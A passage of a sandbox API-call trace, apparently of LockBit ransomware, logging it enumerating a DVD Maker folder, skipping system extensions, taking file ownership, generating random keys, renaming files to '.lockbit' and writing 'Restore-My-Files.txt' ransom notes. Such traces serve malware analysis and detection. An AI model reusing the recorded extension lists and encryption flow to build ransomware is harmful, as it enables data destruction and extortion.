param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.069] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.069] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54e68005, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0092.069] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0092.069] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0092.069] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0092.070] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.070] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.070] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.070] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.071] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.071] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0092.072] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0092.072] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0092.072] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0092.072] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0092.072] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0092.072] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0092.072] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.072] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0092.072] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.072] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.072] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.072] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.073] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.073] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.073] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 100 [0092.073] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.075] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.076] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.076] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.078] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.079] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.079] RtlFreeAnsiString (AnsiString="\\") [0092.079] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0092.079] malloc (_Size=0x200) returned 0x77d800 [0092.079] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.079] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.079] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.079] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.080] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.083] CloseHandle (hObject=0x1194) returned 1 [0092.083] free (_Block=0x77d800) [0092.083] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0092.083] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.083] malloc (_Size=0x40068) returned 0x3d70048 [0092.086] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3130) returned 1 [0092.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0092.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0092.091] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.100] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.100] malloc (_Size=0xde) returned 0x77d800 [0092.100] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xde, FileInformationClass=0xa) returned 0x0 [0092.100] free (_Block=0x77d800) [0092.101] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.101] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.101] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.101] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7d8fa7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7d8fa7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54f98af5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0092.101] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0092.101] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0092.101] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0092.101] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.101] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.101] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.102] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.102] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.103] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.103] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.103] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.103] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0092.103] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0092.103] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0092.103] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0092.103] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0092.103] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0092.103] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0092.103] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.103] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png") returned=".png" [0092.104] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.104] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.104] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.104] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.104] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.105] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.105] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.lockbit") returned 95 [0092.105] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.107] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.109] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.109] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.110] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.112] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.112] RtlFreeAnsiString (AnsiString="\\") [0092.112] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0092.112] malloc (_Size=0x200) returned 0x77d800 [0092.112] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.112] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.112] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.113] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.113] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.114] CloseHandle (hObject=0x13d8) returned 1 [0092.114] free (_Block=0x77d800) [0092.114] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0092.114] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.114] malloc (_Size=0x40068) returned 0x3db00b8 [0092.117] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=5025) returned 1 [0092.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0092.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0092.122] ReadFile (in: hFile=0x13d8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.137] malloc (_Size=0xd4) returned 0x77d800 [0092.137] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd4, FileInformationClass=0xa) returned 0x0 [0092.138] free (_Block=0x77d800) [0092.138] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.138] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.138] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.138] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f78cced, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f78cced, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0092.138] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0092.138] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0092.138] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") 